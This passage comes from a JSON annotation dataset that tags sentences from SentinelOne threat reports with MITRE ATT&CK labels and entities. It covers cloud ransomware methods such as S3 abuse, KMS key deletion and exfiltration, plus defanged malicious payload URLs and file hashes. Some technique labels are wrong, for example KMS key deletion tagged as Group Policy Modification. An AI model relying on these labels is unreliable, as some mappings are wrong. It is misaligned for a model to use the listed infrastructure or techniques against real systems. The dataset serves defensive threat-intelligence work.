5c85ed43d21ff567ee3369fe97b6ed\nf72ade72050a6ce63224aad2c7699160705b414c\nf9db9f525f2bf09f2b85c91ea09f6251e00e2a95\nfbcd460acbe8c0919f61946ac0c9ee4d8885075a\nfff1b8681eadf590034f61ddd69ba035c6980e12\nURLs\nadversary\nShare\nAleksandar Milenkoski\nAleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s62-cf5494", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "6a43e8c05194e066b85845e454d41bf86e1ab376\n6a977ae1ad3466f20f50e101b5a561ad3ffc3aa7\n6c3d57a7b6631adbe3b6a2c2d88eef6593c51900\n6e00ef494a5955df4802c078ae3ffc6c6abdcbd7\n72b3be646f03a71e8a2632096ddf6638bc0141c9\n7339585c17aaa96e93f971b64548666a3b09d1f9\n738aff3e88f498c3607eeadd37b95791acf40196\n76b1bb307e1489999da725c2c9fac5b4581cb448\n7992e075bc9de98e944930372f1768ccc08e429f\n79ce7defeed60bba523bc3779cb9379435157f93\n7bbe644df54723d7a48bef58a616a62559401d0d\n7e82f8608c199eb32230dd2706c11b2e70ba13d8\n7f3c5142f60cd36073b54eda77b38be754a5f7d5\n824268bffde52dc44fedc254dc59ef559b7b2d17\n830c4e2cc10bbf122882a177a3ea8e810b114c82\n8752dab95747175bdb6cb7772cf4d11858049c9d\n87ff9f5f3f4853d0c218ac36182fa18bc5e206d0\n890c8ab68be8990deb26dab6f5c82f0a812b9fcb\n8c62851c74dc2bd1077edfb7456f87b47199925c\n8cc16c418764d26b15d41f713551a7d0f214ab4c\n97bab3df5acbd1e4ad8b9a38cbbd80c297971490\n9ab7bc8a9b4ccbc75903e78d96357e11dfd97535\n9c997e9ee92209be186de2a4f9696122bdfbc46d\n9eaa52e9f72f0b43648699a3a511d0a7c6ffcdd5\na0721a76cc8a0e44bf734206638ba013da809325\na28db721736fe5d6281c08b4f2f396da480eb170\na53b9e14f316a62e8c6c7a53a7c98158fda29533\na7c7233274e34b69b6c62caceebb19135f9034b2\nacc753a084b8172981b3086122929eb4abde131a\nafd5ccd6effb4eed6aec656a25ed869b954ee213\naffcb29e3e8b510cab6b836672511bc738f2d328\nb0253186f56662ecfbebf95cc91a887e161e32d3\nb427cf74c820985cc3cedef68b9953c2e83631e1\nb50ced2769e74050b130fbcb28c6d80880cfe612\nb7ce5ab969a2088a7d6c401c72eeff63173ce491\nbed147a98e6bff36cf3bccfc7640d444040e1f0c\nc3aa8423bba6f01528f822eddb692ae56aa1be6b\nc43f60bf6c24dd6c290b40afb26ea60094688a73\nc4c59fc68f225bdec7e22bead289fda2503fb6b0\nc5239a9994ca54ac08e45ce7443d9226151d0b36\ncd5892ca5b21999799a04d72fb93dc815f7227aa\ncdd2f94c542bf369702271cd83c6aa9ff2e595ea\nd1dca2dc87376c833644a04c74e4f102565e810a\nd2e078450e479a6cd3b1d95597fd2204fd370c42\nd86aabf4713b18718421b5c0fd4084143d4f7f08\ndb9521169aaad154e31d4e573414459e26b57900\ndc04ad9e1d8022a06a28d0522b2a1988c8ed4bab\ndcdf79b172f340dc173d038d05c7eb826c55c3dc\ndd46a9c61ad4aee2c865a4144733d1daf7d6bc79\ndec59a76e8f1703d15fcb7f7532c759aaf717165\ndf0a90c8890f83f760e41c853d9033d3971194e9\ndf99c6fabdf6fc664e9c466af8a2986af0bfbfb8\ndff84020be1f4691bed628d300df8a8b12a4de7e\ndff84020be1f4691bed628d300df8a8b12a4de7e\ne6215a2e0c4745eef724019cab07c04dac75725e\ne9f9a5f559366a8e66f81d43ecc05d051b6e3853\neaa2c945b22f5c1b8bfbd6d8692826d841fc9185\nf00493ea6b1a2cb50c74feb3af65bfaabf327a07\nf534e0a04ceb6f3e1a10209f416675e9df127afc\nf5a99ecd7847cc79210d5df505e222828ad63199\nf66d71e1ab5c85ed43d21ff567ee3369fe97b6ed\nf72ade72050a6ce63224aad2c7699160705b414c\nf9db9f525f2bf09f2b85c91ea09f6251e00e2a95\nfbcd460acbe8c0919f61946ac0c9ee4d8885075a\nfff1b8681eadf590034f61ddd69ba035c6980e12\nURLs\nadversary\nShare\nAleksandar Milenkoski\nAleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "sentence_text": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s63-a92e21", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "sentence_text": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s64-c24a3d", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "sentence_text": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s65-01999c", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "sentence_text": "Prev\nKimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s66-a3b924", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "Prev\nKimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit", "sentence_text": "Next Radare2 Power Ups | Delivering Faster macOS Malware Analysis With r2 Customization", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s67-ba062f", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "Next Radare2 Power Ups | Delivering Faster macOS Malware Analysis With r2 Customization", "sentence_text": "Related Posts PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation October 22 2025 Contagious Interview | North Korean Threat Actors Reveal Plans and Ops by Abusing Cyber Intel Platforms September 04 2025 Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today’s Adversaries April 28 2025 [FILTERED_TABLES_START]\nAudaction | https[://]audaction.fra1.digitaloceanspaces[.]com/pass/alma32.cdr", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s68-3204d5", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "Related Posts PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation October 22 2025 Contagious Interview | North Korean Threat Actors Reveal Plans and Ops by Abusing Cyber Intel Platforms September 04 2025 Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today’s Adversaries April 28 2025 [FILTERED_TABLES_START]\nAudaction | https[://]audaction.fra1.digitaloceanspaces[.]com/pass/alma32.cdr", "sentence_text": "Azuredatabrickstrainne | https[://]azuredatabrickstrainne.sfo3.digitaloceanspaces[.]com/Workspace.zip Believeonline | https[://]believeonline.ams3.digitaloceanspaces[.]com/acoustic/p0.cdr Cleannertools | https[://]cleannertools.fra1.cdn.digitaloceanspaces[.]com/word.ppt Dssmithcheck | https[://]dssmithcheck.fra1.digitaloceanspaces[.]com/track01.sql Fintecgroup | https[://]fintecgroup.ams3.digitaloceanspaces[.]com/louse.msf Ingretationcompatible | http[://]ingretationcompatible.sgp1.digitaloceanspaces[.]com/board.zip", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s69-5cee04", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "Azuredatabrickstrainne | https[://]azuredatabrickstrainne.sfo3.digitaloceanspaces[.]com/Workspace.zip Believeonline | https[://]believeonline.ams3.digitaloceanspaces[.]com/acoustic/p0.cdr Cleannertools | https[://]cleannertools.fra1.cdn.digitaloceanspaces[.]com/word.ppt Dssmithcheck | https[://]dssmithcheck.fra1.digitaloceanspaces[.]com/track01.sql Fintecgroup | https[://]fintecgroup.ams3.digitaloceanspaces[.]com/louse.msf Ingretationcompatible | http[://]ingretationcompatible.sgp1.digitaloceanspaces[.]com/board.zip", "sentence_text": "Jackfrostgo | http[://]jackfrostgo.fra1.digitaloceanspaces[.]com/thems%20(4).cdr Marthmusicclub | https[://]marthmusicclub.sfo3.digitaloceanspaces[.]com/betunios.cdr Munich | https[://]munich.ams3.digitaloceanspaces[.]com/Minimize.jpeg", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s70-c75bd2", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "Jackfrostgo | http[://]jackfrostgo.fra1.digitaloceanspaces[.]com/thems%20(4).cdr Marthmusicclub | https[://]marthmusicclub.sfo3.digitaloceanspaces[.]com/betunios.cdr Munich | https[://]munich.ams3.digitaloceanspaces[.]com/Minimize.jpeg", "sentence_text": "Partyprogames | https[://]partyprogames.ams3.digitaloceanspaces[.]com/bets.cdr Pexelsfiles | http[://]pexelsfiles.ams3.digitaloceanspaces[.]com/pexels.ppt Pratoonecooltool | https[://]pratoonecooltool.sfo3.digitaloceanspaces[.]com/national.ppt", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s71-3f6db6", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "Partyprogames | https[://]partyprogames.ams3.digitaloceanspaces[.]com/bets.cdr Pexelsfiles | http[://]pexelsfiles.ams3.digitaloceanspaces[.]com/pexels.ppt Pratoonecooltool | https[://]pratoonecooltool.sfo3.digitaloceanspaces[.]com/national.ppt", "sentence_text": "Ryzemamd | https[://]ryzemamd.ams3.digitaloceanspaces[.]com/amd.cdr Ryzenbootsector | http[://]ryzenbootsector.fra1.digitaloceanspaces[.]com/ryzen%20(3).zip Starbuckplaylist |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s1-20bb51", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Cloud services inherently provide an advantage over endpoint and web server-based services due to the minimal nature of a cloud service’s attack surface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s2-7b9b88", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "Cloud services inherently provide an advantage over endpoint and web server-based services due to the minimal nature of a cloud service’s attack surface.", "sentence_text": "We have identified several tools designed to target web servers with ransomware or to leverage cloud services to upload files before encrypting local files on an endpoint.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Encrypt local files using ransomware and upload files via cloud services before encryption.", "entities": [ { "text": "tools", "start": 27, "end": 32, "label": "MalwareTool" }, { "text": "target web servers", "start": 45, "end": 63, "label": "Action" }, { "text": "upload files", "start": 113, "end": 125, "label": "Action" }, { "text": "encrypting local files", "start": 133, "end": 155, "label": "Action" }, { "text": "web servers", "start": 52, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "cloud services", "start": 95, "end": 109, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s3-2dbed4", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "We have identified several tools designed to target web servers with ransomware or to leverage cloud services to upload files before encrypting local files on an endpoint.", "sentence_text": "There are also far fewer references to scripts designed to perform ransom attacks directly on cloud services, with the exception of several red teaming tools hosted on GitHub.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Perform ransom attacks on cloud services.", "entities": [ { "text": " scripts", "start": 38, "end": 46, "label": "MalwareTool" }, { "text": "red teaming tools", "start": 140, "end": 157, "label": "MalwareTool" }, { "text": "GitHub.", "start": 168, "end": 175, "label": "Infrastructure_Indicator" }, { "text": "cloud services", "start": 94, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "perform ransom attacks directly on cloud services", "start": 59, "end": 108, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s4-fda62f", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "There are also far fewer references to scripts designed to perform ransom attacks directly on cloud services, with the exception of several red teaming tools hosted on GitHub.", "sentence_text": "Note:\nThe scope of this report does not include attacks against on-premises hosted cloud infrastructure, such as VMWare ESXi.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s5-b0eec2", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "Note:\nThe scope of this report does not include attacks against on-premises hosted cloud infrastructure, such as VMWare ESXi.", "sentence_text": "Ransomware actors have long targeted ESXi which was the first Linux operating system widely attacked by organized ransomware groups Cloud Ransom Attack Mechanics Cloud ransom attacks typically target cloud-based storage services, such as Amazon’s Simple Storage Service ( S3 ) or Azure Blob Storage .", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Target ESXi and cloud-based storage services with ransomware", "entities": [ { "text": "Ransomware actors", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "organized ransomware groups", "start": 104, "end": 131, "label": "ThreatActor" }, { "text": "ESXi", "start": 37, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "Linux operating system", "start": 62, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "Amazon’s Simple Storage Service ( S3 ) or Azure Blob Storage .", "start": 238, "end": 300, "label": "Infrastructure_Indicator" }, { "text": "targeted", "start": 28, "end": 36, "label": "Action" }, { "text": "attacks", "start": 175, "end": 182, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s6-9289ea", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "Ransomware actors have long targeted ESXi which was the first Linux operating system widely attacked by organized ransomware groups Cloud Ransom Attack Mechanics Cloud ransom attacks typically target cloud-based storage services, such as Amazon’s Simple Storage Service ( S3 ) or Azure Blob Storage .", "sentence_text": "Cloud service providers (CSPs) have implemented robust security mechanisms that minimize the risk of data being lost permanently.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s7-9105b3", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "Cloud service providers (CSPs) have implemented robust security mechanisms that minimize the risk of data being lost permanently.", "sentence_text": "The attacker takes advantage of an overly permissive S3 bucket where they have write-level access, which is often the result of misconfiguration or accessed in the targeted environment through other means, such as valid credentials.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Exploiting misconfigured cloud storage (S3 bucket)", "entities": [ { "text": "The attacker", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": " overly permissive S3 bucket", "start": 34, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "takes advantage of an overly permissive S3 bucket", "start": 13, "end": 62, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s8-ca38aa", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "The attacker takes advantage of an overly permissive S3 bucket where they have write-level access, which is often the result of misconfiguration or accessed in the targeted environment through other means, such as valid credentials.", "sentence_text": "This technique utilizes a new KMS key, meaning the attacker would schedule the key for deletion and be subject to the 7-day window before the key is permanently deleted in the victim’s environment.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1484.001", "name": "Group Policy Modification" } ], "procedure": "Scheduling deletion of a cloud KMS key", "entities": [ { "text": "the attacker", "start": 47, "end": 59, "label": "ThreatActor" }, { "text": " KMS key", "start": 29, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "schedule the key for deletion", "start": 66, "end": 95, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s9-43bc36", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "This technique utilizes a new KMS key, meaning the attacker would schedule the key for deletion and be subject to the 7-day window before the key is permanently deleted in the victim’s environment.", "sentence_text": "This technique is still subject to the 7-day key deletion policy, which provides a window of opportunity for the customer to remediate before the key is deleted forever.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s10-efedd9", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "This technique is still subject to the 7-day key deletion policy, which provides a window of opportunity for the customer to remediate before the key is deleted forever.", "sentence_text": "Despite increasingly thorough security measures, researchers continue to find new ways to circumvent CSP controls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s11-af46fa", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "Despite increasingly thorough security measures, researchers continue to find new ways to circumvent CSP controls.", "sentence_text": "This technique allows an attacker to encrypt files in such a way that the decryption key is controlled by the victim, which prevents the CSP from recovering the key.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "An attacker encrypts files so that the decryption key is controlled by the victim, preventing recovery.", "entities": [ { "text": "attacker", "start": 25, "end": 33, "label": "ThreatActor" }, { "text": "encrypt files", "start": 37, "end": 50, "label": "Action" }, { "text": "decryption key", "start": 74, "end": 88, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s12-a9bb5b", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "This technique allows an attacker to encrypt files in such a way that the decryption key is controlled by the victim, which prevents the CSP from recovering the key.", "sentence_text": "Organizations can prevent this type of attack by implementing Service Control Policies (SCP) that block calls to risky APIs, including the kms:CreateCustomKeyStore API Ransomware Using Cloud Services For Data Exfiltration Aside from ransomware targeting cloud services, threat actors are increasingly using cloud services to exfiltrate the data they intend to ransom.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s13-9c501b", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Organizations can prevent this type of attack by implementing Service Control Policies (SCP) that block calls to risky APIs, including the kms:CreateCustomKeyStore API Ransomware Using Cloud Services For Data Exfiltration Aside from ransomware targeting cloud services, threat actors are increasingly using cloud services to exfiltrate the data they intend to ransom.", "sentence_text": "In September 2024, modePUSH reported that the BianLian and Rhysida ransomware groups are now using Azure Storage Explorer to exfiltrate data from victim environments in lieu of historically popular tools like MEGAsync and rclone.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "exfiltrate data", "entities": [ { "text": "BianLian", "start": 46, "end": 54, "label": "ThreatActor" }, { "text": "Rhysida ransomware groups", "start": 59, "end": 84, "label": "ThreatActor" }, { "text": "Azure Storage Explorer", "start": 99, "end": 121, "label": "MalwareTool" }, { "text": "MEGAsync and rclone.", "start": 209, "end": 229, "label": "MalwareTool" }, { "text": "victim environments", "start": 146, "end": 165, "label": "Infrastructure_Indicator" }, { "text": "exfiltrate data", "start": 125, "end": 140, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s14-d5efae", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "In September 2024, modePUSH reported that the BianLian and Rhysida ransomware groups are now using Azure Storage Explorer to exfiltrate data from victim environments in lieu of historically popular tools like MEGAsync and rclone.", "sentence_text": "In October 2024, Trend Micro reported that a ransomware actor mimicking the notorious Lockbit ransomware group used samples that leverage Amazon’s S3 storage to exfiltrate data stolen from the targeted Windows or macOS systems.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "exfiltrate data", "entities": [ { "text": " ransomware actor mimicking the notorious Lockbit ransomware group", "start": 44, "end": 110, "label": "ThreatActor" }, { "text": "samples", "start": 116, "end": 123, "label": "MalwareTool" }, { "text": " Amazon’s S3 storage", "start": 137, "end": 157, "label": "Infrastructure_Indicator" }, { "text": " targeted Windows or macOS systems.", "start": 192, "end": 227, "label": "Infrastructure_Indicator" }, { "text": "exfiltrate data", "start": 161, "end": 176, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s15-8fc5b6", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "In October 2024, Trend Micro reported that a ransomware actor mimicking the notorious Lockbit ransomware group used samples that leverage Amazon’s S3 storage to exfiltrate data stolen from the targeted Windows or macOS systems.", "sentence_text": "SentinelLabs has identified a Python script on VirusTotal that we call RansomES due to the Spanish language comments in the code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s16-43089e", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "SentinelLabs has identified a Python script on VirusTotal that we call RansomES due to the Spanish language comments in the code.", "sentence_text": "The script then provides the actor with methods to exfiltrate the files to S3 or FTP, and then encrypt the local versions.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "The script enables the attacker to exfiltrate victim files to remote storage (S3 or FTP) and encrypt local copies for ransomware-style impact.", "entities": [ { "text": "exfiltrate the files", "start": 51, "end": 71, "label": "Action" }, { "text": "encrypt the local versions", "start": 95, "end": 121, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s17-0b1880", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "The script then provides the actor with methods to exfiltrate the files to S3 or FTP, and then encrypt the local versions.", "sentence_text": "RansomES is a simple script and we do not believe it has been used in the wild.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s18-7ebefe", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "RansomES is a simple script and we do not believe it has been used in the wild.", "sentence_text": "The author included an internet connectivity check to the WannaCry killswitch domain, which may suggest the script was developed by a researcher or someone with an interest in threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s19-a1d2ab", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "The author included an internet connectivity check to the WannaCry killswitch domain, which may suggest the script was developed by a researcher or someone with an interest in threat intelligence.", "sentence_text": "Web Application Ransom Attacks Web applications are often run via cloud services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s20-31914f", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "Web Application Ransom Attacks Web applications are often run via cloud services.", "sentence_text": "Their more minimal nature makes cloud environments a natural hosting point where the applications are easier to manage and require less configuration and upkeep than running on a full operating system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s21-355da2", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "Their more minimal nature makes cloud environments a natural hosting point where the applications are easier to manage and require less configuration and upkeep than running on a full operating system.", "sentence_text": "However, web applications themselves are vulnerable to extortion attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s22-3ff926", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "However, web applications themselves are vulnerable to extortion attacks.", "sentence_text": "SentinelLabs has identified several ransom scripts that target PHP applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s23-716cea", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "SentinelLabs has identified several ransom scripts that target PHP applications.", "sentence_text": "We identified a Python script called Pandora, a muti-tool targeting a variety of web services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s24-5ddb98", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "We identified a Python script called Pandora, a muti-tool targeting a variety of web services.", "sentence_text": "This tool is unrelated to the Pandora ransomware group, which leverages binaries to target Windows systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s25-f89815", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "This tool is unrelated to the Pandora ransomware group, which leverages binaries to target Windows systems.", "sentence_text": "The PHP ransom functions encrypt files using AES via the OpenSSL library.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "encrypt files using AES via OpenSSL", "entities": [ { "text": " PHP ransom functions", "start": 3, "end": 24, "label": "MalwareTool" }, { "text": "encrypt files", "start": 25, "end": 38, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s26-b89843", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "The PHP ransom functions encrypt files using AES via the OpenSSL library.", "sentence_text": "The Pandora Python script runs on the webserver, writing the PHP code output to the path pandora/Ransomware with a file name provided as an argument at runtime and appended with the .php extension.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "writes PHP code output to a webserver path", "entities": [ { "text": "Pandora Python script", "start": 4, "end": 25, "label": "MalwareTool" }, { "text": "writing the PHP code output", "start": 49, "end": 76, "label": "Action" }, { "text": "webserver", "start": 38, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s27-d93bac", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "The Pandora Python script runs on the webserver, writing the PHP code output to the path pandora/Ransomware with a file name provided as an argument at runtime and appended with the .php extension.", "sentence_text": "We identified another PHP ransom script attributed to the IndoSec group, an Indonesia-based threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s28-d43b89", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "We identified another PHP ransom script attributed to the IndoSec group, an Indonesia-based threat actor.", "sentence_text": "This script is a PHP backdoor that the attacker can use to manage and delete files, and perform ransom attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s29-5c7bf4", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "This script is a PHP backdoor that the attacker can use to manage and delete files, and perform ransom attacks.", "sentence_text": "The script traverses directories recursively while it reads and base64-encodes file contents.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "traverse directories and encode file contents", "entities": [ { "text": "The script", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": " traverses directories recursively", "start": 10, "end": 44, "label": "Action" }, { "text": "reads", "start": 54, "end": 59, "label": "Action" }, { "text": "base64-encodes file contents", "start": 64, "end": 92, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s30-f60b70", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "The script traverses directories recursively while it reads and base64-encodes file contents.", 